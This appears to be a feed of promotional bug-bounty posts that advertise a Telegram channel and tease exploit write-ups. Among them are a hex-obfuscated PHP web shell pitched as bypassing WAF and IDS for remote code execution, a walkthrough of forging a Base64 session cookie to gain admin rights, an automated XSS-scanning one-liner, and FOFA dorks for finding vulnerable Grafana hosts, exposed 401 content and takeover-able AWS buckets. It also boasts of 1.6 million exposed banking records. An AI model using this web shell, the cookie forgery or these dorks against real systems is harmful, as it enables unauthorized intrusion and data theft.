Recently disclosed hackerone critical bug, leaking sensitive informations which can exploitable under few minutes! Rewarded $25,000😏 Read the full POC in my telegram channel 👉🏼 t.me/ShellSec/67

Don't skip👇🏼 If you Found a Base64 session cookie: e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg== Decoded: {user:darkshadow,role:user} Modify to: {user:darkshadow,role:admin} Encoded: e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQ= Replaced cookie → Admin access join👇🏼t.me/ShellSec

🚨Google was vulnerable by a critical SSRF vulnerability rewarded $13,000 🔥 Read the full POC in my telegram channel 👉🏼 t.me/ShellSec/80 ㅤ

Good morning hacker's ❤️

💥 GitLab Password Reset via Account Takeover Vulnerability paid $35,000 😬 Read the full POC on my telegram channel t.me/ShellSec/88

✨Find XSS using my 5 one-liner killer command💯 gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe Read all👉🏼 t.me/ShellSec/92

ㅤ 🔥Reddit was vulnerable by XSS as easiest way possible✨ 👀Old POC but you should enjoy to read this. 💯read the full POC in my telegram channel t.me/ShellSec/95

🔥Before testing file upload vulnerability, test the filename parameter.🌀 For more bug bounty tips & tricks join my telegram channel 👇🏼 ㅤㅤㅤt.me/ShellSec

🔥Out of scope target lead in-Scope target AUTH bypass vulnerability💥 The target was use a proxy server to load content used by the proxy. But here comes the twist, i found a backup.zip file in there proxy server ... Read the full story👉🏼t.me/ShellSec/104 ㅤ

ㅤ 💥arbitrary administrator role user creation vai using WordPress plugin💯 For more join my telegram channel 👉🏼 t.me/ShellSec

ㅤ 🔥Find all VDP in world wide using this simple dork😎 Dork: (body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443" ✨For more bugbounty & pen testing tips join my telegram channel 🤍 t.me/ShellSec

Using FOFA FOFA Dorking you can see the content behind 401 unauthenticated🤯 Dork: domain="401_subdomain" && (body=".php" || body=".pdf" || body=".xls" || body=".html" || body=".js" || body=".json" || body=".jpg" || body=".conf") Read full on telegram t.me/ShellSec/120?s…

🌀Chrome DevTools is actually a webpage itself🙆🏼 Url: devtools://devtools/bundled/devtools_app.html Try this: 🔥 Open the URL 🔥 Then hit F12 inside DevTools 🔥 BOOM — you're debugging the DevTools itself 🤯 ✨For more join my telegram channel t.me/ShellSec ㅤ

🌀I made this payload that able to bypass WAF even IDS to execute RCE✅ <?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?> 👀Hex decode: if($x_=$_GET[0]){system($x_);} 🔥For more join my telegram channel t.me/ShellSec

ㅤ ✨Grafana CVE-2025-4123 AWS SSRF FOFA dork that find all vulnerable versions💯 👀 Very big Dork: app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" || body="Grafana v10.0.1" || body="Grafana v10.0.2" .....[and more] 🌀Get the full dork: t.me/ShellSec/133

🌀 AWS bucket takeover like a pro and super simple but most of time effective 🔥 🧠 FOFA Dork: body="specified bucket does not exist" && (host="target.com" || host="target_domain_name_only") && port="443" ✨ Full methodology on my telegram t.me/ShellSec/136

🤫Unauthenticated WordPress Auth bypass 🔥 After sending the 1st request use the provided last Cookie and send request on /wp-admin and BOOM auth bypassed 💥 For more join my telegram channel 👉🏼 t.me/ShellSec

🔥1.6M banking records are uncovered 💥 ✨Contains massive informations inside the DB, is it really Cool? 😎

ㅤ 𝘿𝙖𝙧𝙠𝙀𝙣𝙙𝙁𝙞𝙣𝙙𝙚𝙧 my own private tool which i used to extract endpoints from browse through passive recon. ✨ Features: ✅ Extract subdomains. ✅ Extract categories endpoints from subdomains. ✅ Extract external domains. github.com/darkshadow2bd/…